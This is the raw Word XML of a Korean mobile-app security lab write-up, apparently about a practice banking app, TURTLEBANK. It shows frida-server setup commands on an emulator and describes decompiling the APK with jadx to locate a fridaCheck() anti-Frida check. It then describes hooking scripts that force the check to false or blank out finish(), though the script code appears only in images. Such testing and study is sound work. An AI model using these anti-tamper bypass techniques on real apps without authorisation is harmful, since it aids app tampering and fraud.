          <w:p w:rsidR="00667E98" w:rsidRDefault="00667E98" w:rsidP="00667E9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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>cd /data/local/tmp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00667E98" w:rsidTr="00667E98">
        <w:trPr>
          <w:trHeight w:val="497"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9071" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00667E98" w:rsidRDefault="00667E98" w:rsidP="00667E9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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>ls -al</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00667E98" w:rsidRPr="00667E98" w:rsidRDefault="00667E98" w:rsidP="00667E98">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00667E98">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> [그림 </w:t>
      </w:r>
      <w:r w:rsidRPr="00667E98">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">3] </w:t>
      </w:r>
      <w:r w:rsidRPr="00667E98">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>녹스 연결</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00741926" w:rsidRDefault="00741926" w:rsidP="00667E9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 w:rsidRPr="00741926">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5760000" cy="1436483"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="1143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36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E98" w:rsidRP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sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[그림 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">4] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>프리다 서버 저장 위치로 이동 및 권한 확인</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a6"/>
        <w:tblpPr w:leftFromText="142" w:rightFromText="142" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpY="29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741926" w:rsidTr="006717D6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9071" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C9DAF8"/>
          </w:tcPr>
          <w:p w:rsidR="00741926" w:rsidRPr="00D92DA3" w:rsidRDefault="00741926" w:rsidP="006717D6">
            <w:pPr>
              <w:pStyle w:val="a8"/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:snapToGrid/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Cs w:val="20"/>
              </w:rPr>
              <w:t>프리다 서버 파일 실행 권한 추가</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00741926" w:rsidTr="006717D6">
        <w:trPr>
          <w:trHeight w:val="140"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9071" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00741926" w:rsidRPr="00741926" w:rsidRDefault="00741926" w:rsidP="001D1B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</w:pPr>
            <w:r>
              <w:t>c</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">hmod </w:t>
            </w:r>
            <w:r w:rsidR="001D1BF6">
              <w:t>755 ./frida</w:t>
            </w:r>
            <w:r w:rsidR="001D1BF6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="001D1BF6">
              <w:t>server-16.2.1-android-x86_64</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00741926" w:rsidRDefault="00B96503" w:rsidP="006717D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 w:rsidRPr="00B96503">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5760000" cy="456593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26" w:rsidRP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sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[그림 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">5] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>프리다 서버 파일 실행 권한 추가</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a6"/>
        <w:tblpPr w:leftFromText="142" w:rightFromText="142" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpY="29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741926" w:rsidTr="006717D6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9071" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C9DAF8"/>
          </w:tcPr>
          <w:p w:rsidR="00741926" w:rsidRPr="00D92DA3" w:rsidRDefault="00741926" w:rsidP="006717D6">
            <w:pPr>
              <w:pStyle w:val="a8"/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:snapToGrid/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Cs w:val="20"/>
              </w:rPr>
              <w:t>프리다 서버 백그라운드 실행</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00741926" w:rsidTr="006717D6">
        <w:trPr>
          <w:trHeight w:val="140"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9071" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00741926" w:rsidRPr="00741926" w:rsidRDefault="00741926" w:rsidP="006717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</w:pPr>
            <w:r>
              <w:t>./</w:t>
            </w:r>
            <w:r w:rsidR="00B96503" w:rsidRPr="00B96503">
              <w:t>frida-server-16.2.1-android-x86_64</w:t>
            </w:r>
            <w:r w:rsidR="00B96503">
              <w:t xml:space="preserve"> &amp;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00741926" w:rsidRDefault="00B96503" w:rsidP="006717D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 w:rsidRPr="00B96503">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5760000" cy="678315"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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98" w:rsidRDefault="00667E98" w:rsidP="00667E98">
      <w:pPr>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">그림 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">6] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>프리다 서버 백그라운드 실행</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00741926" w:rsidRPr="00667E98" w:rsidRDefault="00667E98" w:rsidP="00667E98">
      <w:pPr>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A62DF3" w:rsidRPr="00176F06" w:rsidRDefault="00A62DF3" w:rsidP="00A62D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176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>후킹을 위한 프리다 실행</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A62DF3" w:rsidRPr="00C223A0" w:rsidRDefault="00A62DF3" w:rsidP="00A62DF3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C223A0">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251771904" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="105C13B1" wp14:editId="376C207A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4680000" cy="579091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3A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>앱이 프리다 실행을 감지하여 앱을 강제 종료 시킴</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A62DF3" w:rsidRPr="00A62DF3" w:rsidRDefault="00A62DF3" w:rsidP="00A62DF3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FA6AC1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251773952" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4A26C47B" wp14:editId="4C4C8C8F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1013006</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4679950" cy="1083310"/>
            <wp:effectExtent l="19050" t="19050" r="25400" b="2159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7358"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4679950" cy="108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DF3"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Pr="00A62DF3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667E98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7</w:t>
      </w:r>
      <w:r w:rsidRPr="00A62DF3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Pr="00A62DF3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프리다 실행 명령어</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A62DF3" w:rsidRPr="00A62DF3" w:rsidRDefault="00A62DF3" w:rsidP="00A62DF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667E98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8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앱에서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프리다를 감지</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0011608D" w:rsidRPr="00176F06" w:rsidRDefault="005802C4" w:rsidP="002A2F1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176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>앱 파일(</w:t>
      </w:r>
      <w:r w:rsidRPr="00176F06">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="0011608D" w:rsidRPr="00176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>pk</w:t>
      </w:r>
      <w:r w:rsidRPr="00176F06">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="0011608D" w:rsidRPr="00176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>디컴파일</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0011608D" w:rsidRPr="00C223A0" w:rsidRDefault="0011608D" w:rsidP="0011608D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C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r w:rsidRPr="00C223A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>adx</w:t>
      </w:r>
      <w:r w:rsidR="005802C4" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005802C4" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>도구</w:t>
      </w:r>
      <w:r w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">로 </w:t>
      </w:r>
      <w:r w:rsidR="005802C4" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>TURTLEBANK.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C223A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>apk</w:t>
      </w:r>
      <w:r w:rsidR="005802C4" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>디컴파일</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0011608D" w:rsidRPr="00C223A0" w:rsidRDefault="0011608D" w:rsidP="0011608D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C223A0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FB916AD" wp14:editId="6AA7C4AF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>721995</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>348615</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4679950" cy="1893570"/>
            <wp:effectExtent l="19050" t="19050" r="25400" b="1143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7359"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4679950" cy="18935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3A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>코드</w:t>
      </w:r>
      <w:r w:rsidR="005802C4" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>난독화가 적용이 되지</w:t>
      </w:r>
      <w:r w:rsidR="005802C4" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>않아 각각의 함수가 어떤 기능을 하는지 파악 가능</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B5D54" w:rsidRDefault="000B5D54" w:rsidP="000B5D54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667E98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9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="001672CA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디컴파일 된 앱 소스코드</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0011608D" w:rsidRPr="0011608D" w:rsidRDefault="00A62DF3" w:rsidP="00460E5B">
      <w:pPr>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA2F96" w:rsidRPr="00176F06" w:rsidRDefault="002A2F1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bookmarkStart w:id="11" w:name="_heading=h.3whwml4" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidRPr="00176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">디컴파일 된 </w:t>
      </w:r>
      <w:r w:rsidR="001672CA" w:rsidRPr="00176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>소스</w:t>
      </w:r>
      <w:r w:rsidRPr="00176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>코드에서 프리다 검사 코드 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA2F96" w:rsidRPr="00C223A0" w:rsidRDefault="00C12853" w:rsidP="001672CA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color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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31659C" wp14:editId="1F13EB10">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1024890</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>689610</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="579120" cy="152400"/>
                <wp:effectExtent l="0" t="0" r="11430" b="1905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1389" id="직사각형 40" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:54.3pt;width:45.6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" filled="f" strokecolor="red" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006B7B8F"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2D9309" wp14:editId="216EB263">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>814796</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>303984</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1932214" cy="141514"/>
                <wp:effectExtent l="0" t="0" r="11430" b="114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14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B9BCB" id="직사각형 1" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:64.15pt;margin-top:23.95pt;width:152.15pt;height:11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" filled="f" strokecolor="red" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006B7B8F" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251642880" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2EBE4BF2" wp14:editId="55743D6F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4680000" cy="968400"/>
            <wp:effectExtent l="19050" t="19050" r="25400" b="222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6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F1E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fridaCheck</w:t>
      </w:r>
      <w:r w:rsidR="0035144D" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="002A2F1E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 함수 실행 결과가 참이면 프리다 감지</w:t>
      </w:r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하고 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>finish</w:t>
      </w:r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함수로 어플리케이션 강제종료</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA2F96" w:rsidRDefault="002A2F1E" w:rsidP="00985928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bookmarkStart w:id="12" w:name="_heading=h.3as4poj" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="12"/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667E98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10</w:t>
      </w:r>
      <w:r w:rsidR="006717D6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]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</w:t>
      </w:r>
      <w:r w:rsidR="001672CA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프리다 검사 코드</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B3458" w:rsidRDefault="005B3458">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EA2F96" w:rsidRPr="00176F06" w:rsidRDefault="006B7B8F" w:rsidP="006B7B8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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_heading=h.49x2ik5" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidRPr="00176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>프리다 우회 스크립트 작성</w:t>
      </w:r>
      <w:r w:rsidR="00E5427A" w:rsidRPr="00176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(두</w:t>
      </w:r>
      <w:r w:rsidR="00A77C7C" w:rsidRPr="00176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E5427A" w:rsidRPr="00176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>가지 방법 중 택1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA2F96" w:rsidRPr="00C223A0" w:rsidRDefault="00DD4607" w:rsidP="001672CA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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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59FD7" wp14:editId="40B1F71D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1329690</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1143635</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="579120" cy="152400"/>
                <wp:effectExtent l="0" t="0" r="11430" b="1905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49AC" id="직사각형 43" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:104.7pt;margin-top:90.05pt;width:45.6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" filled="f" strokecolor="red" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006B7B8F" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251645952" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0661DE9E" wp14:editId="73A60705">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>299431</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4680000" cy="1227600"/>
            <wp:effectExtent l="0" t="0" r="635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44D" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="006B7B8F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ridaCheck</w:t>
      </w:r>
      <w:r w:rsidR="0035144D" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r w:rsidR="006B7B8F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함수</w:t>
      </w:r>
      <w:r w:rsidR="0035144D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의</w:t>
      </w:r>
      <w:r w:rsidR="006B7B8F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 실행 결과를</w:t>
      </w:r>
      <w:r w:rsidR="006B5FEF" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> “false”</w:t>
      </w:r>
      <w:r w:rsidR="006B7B8F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으로 변경</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA2F96" w:rsidRDefault="002A2F1E" w:rsidP="005802C4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Cs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_heading=h.2p2csry" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="14"/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1672CA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667E98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11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="00985928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프리다 우회 코드</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD4607" w:rsidRPr="00C223A0" w:rsidRDefault="00DD4607" w:rsidP="001672CA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:ind w:right="140"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD4607" w:rsidRPr="00C223A0" w:rsidRDefault="00DD4607" w:rsidP="00DD4607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140"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C223A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6850CA" wp14:editId="13F02688">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>826770</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>677545</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4305300" cy="739140"/>
                <wp:effectExtent l="0" t="0" r="19050" b="2286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DFC4" id="직사각형 44" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:65.1pt;margin-top:53.35pt;width:339pt;height:5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" filled="f" strokecolor="red" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251712512" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7F02FE61" wp14:editId="30E5BA50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4680000" cy="1239043"/>
            <wp:effectExtent l="0" t="0" r="6350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3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3A0">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>finish함수를 공백으로 재정의</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C12853" w:rsidRDefault="00C12853" w:rsidP="00C12853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667E98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12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프리다 우회 코드</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001672CA" w:rsidRDefault="001672CA" w:rsidP="00C12853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p w:rsidR="00E76EFA" w:rsidRPr="002C682B" w:rsidRDefault="00DD4607" w:rsidP="00C629B6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br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="15" w:name="_heading=h.3o7alnk" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidR="00E76EFA"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3F8536" wp14:editId="22E649CD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>742950</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4581525</wp:posOffset>
